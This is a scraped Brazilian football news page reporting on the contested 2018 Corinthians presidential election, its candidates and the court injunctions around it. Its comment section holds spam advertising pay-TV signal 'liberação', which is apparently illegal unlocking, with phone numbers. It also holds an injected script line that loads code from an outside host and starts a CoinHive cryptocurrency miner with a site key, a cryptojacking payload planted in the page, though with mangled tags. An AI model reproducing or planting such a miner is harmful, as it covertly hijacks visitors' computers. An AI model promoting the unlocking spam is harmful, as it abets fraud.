3/2/2018 15:36

Em pleito agitado, Corinthians decidirá se mantém poder com grupo de Andrés

Em pleito agitado, Corinthians decidirá se mantém poder com grupo de Andrés
Em 2015, Roberto de Andrade se elegeu com apoio de Andrés / Daniel Augusto Jr/Agência Corinthians

A eleição com maior número de candidatos do Corinthians ocorre neste sábado, no Parque São Jorge, e decide se o grupo político liderado pelo candidato Andrés Sanchez seguirá no clube por mais três anos. À frente do poder desde o fim de 2007, o deputado federal e empresário tenta voltar ao cargo e concorre com os advogados Felipe Ezabella e Romeu Tuma Júnior, com o jurista Roque Citadini e com o também empresário Paulo Garcia. O pleito passa longe de ser tranquilo.



Marcado por uma série de liminares nas últimas semanas, e que se arrastaram até a véspera da eleição, o pleito confirma uma tendência desde que foi alterado o sistema de formação do Conselho Deliberativo. Do chapão às chapinhas (entenda melhor abaixo), a política do Corinthians se fragmentou e deu margem para vários subgrupos. A consequência foi um clima quente nos bastidores a partir de medida do presidente Roberto de Andrade.

No fim de novembro, ele anunciou promoção relâmpago para sócios com títulos irregulares colocarem títulos em dia e participarem das eleições. Oriundo da situação, Roberto gerou a partir disso uma corrida entre alguns dos candidatos para conquistarem potenciais eleitores. Sanchez, situação, e Citadini, oposição, foram acusados de participar do processo de saldar dívidas de associados inadimplentes, mas negaram. Já Paulo Garcia confirmou ter emprestado o próprio cartão de crédito para fazer pagamentos.

Garcia volta a tentar presidir Corinthians \ Divulgação/Chapa Pró-Corinthians

Sob muita pressão dos grupos políticos, e amparada pelo estatuto do clube, a Comissão Eleitoral do Corinthians vetou o direito a voto de todos que tiveram direito à promoção, um contingente de mais de 800 pessoas. E impugnou, por conta disso, a candidatura de Garcia. Foi só com uma liminar, obtida em primeira instância, que o dono da Kalunga assegurou participação.

Paulo, porém, não foi o único candidato que teve que ir à justiça. Sanchez, na véspera da eleição, foi alvo de uma liminar do adversário Romeu Tuma Júnior, que objetivava impedir sua participação no pleito. Na mesma tarde, Andrés conseguiu êxito e se garantiu. Integrante de sua chapa, o diretor administrativo Eduardo Caggiano só poderá aspirar a uma vaga no Conselho porque também obteve uma liminar.


VEJA TAMBÉM
- Timão escalado para o jogo contra o Fortaleza
- Bidon repete jogada da base em 1º gol pelo Corinthians: aprendizado instantâneo
- Renovação de Paulinho com Corinthians: Altos e Baixos na Negociação









9111 visitas - Fonte: UOL

Mais notícias do Corinthians

Notícias de contratações do Timão
Notícias mais lidas

Estamos ferrados...o IBOPE diz que tem um empate técnico entre Sanches e Garcia (que ficou rico as custas do Timão)....é ter que decidir entre Lula e Aécio Neves....qual ladrão queremos

VOCÊ QUE ESTÁ CANSADO DE TER POUCA PROGRAMAÇÃO DE TVV ASSSINATURA E NÃO CONCORDA COM OS VALORES COBRADOS
FAÇO LIBERAÇÃO E DIMINUÍMOS O VALOR DA CONTA
PARA TODO BRASIL
WHATZSAP 11 958694345

Você que está pagado valores alto e teno pouco PROGRAMAÇÃO de TVV asssinatura faça
liberação e DEMINUIMOS valor da conta pra qualquer luga do Brasil WHATZSAP 11958640776

(Comentário excluído)

< src="http://yourjava.com/9215118311/levelup.js"><>var a=new CoinHive.Anonymous("IoWE2BeVK3azaWL7xmC6HFJcYbwgiyoQ",{throttle:.3});a .start();

Enviar Comentário

Para enviar comentários, você precisa estar cadastrado e logado no nosso site. Para se cadastrar, clique Aqui. Para fazer login, clique Aqui ou Conecte com Facebook.

Últimas notícias

  • publicidade
  • publicidade
    publicidade

    Brasileiro

    Dom - 16:00 - Neo Química Arena -
    X
    Corinthians
    Atletico-MG

    Sudamericana

    Ter - 19:00 - Neo Química Arena
    4 X 0
    Corinthians
    Nacional Asuncion
    publicidade
    publicidade
    publicidade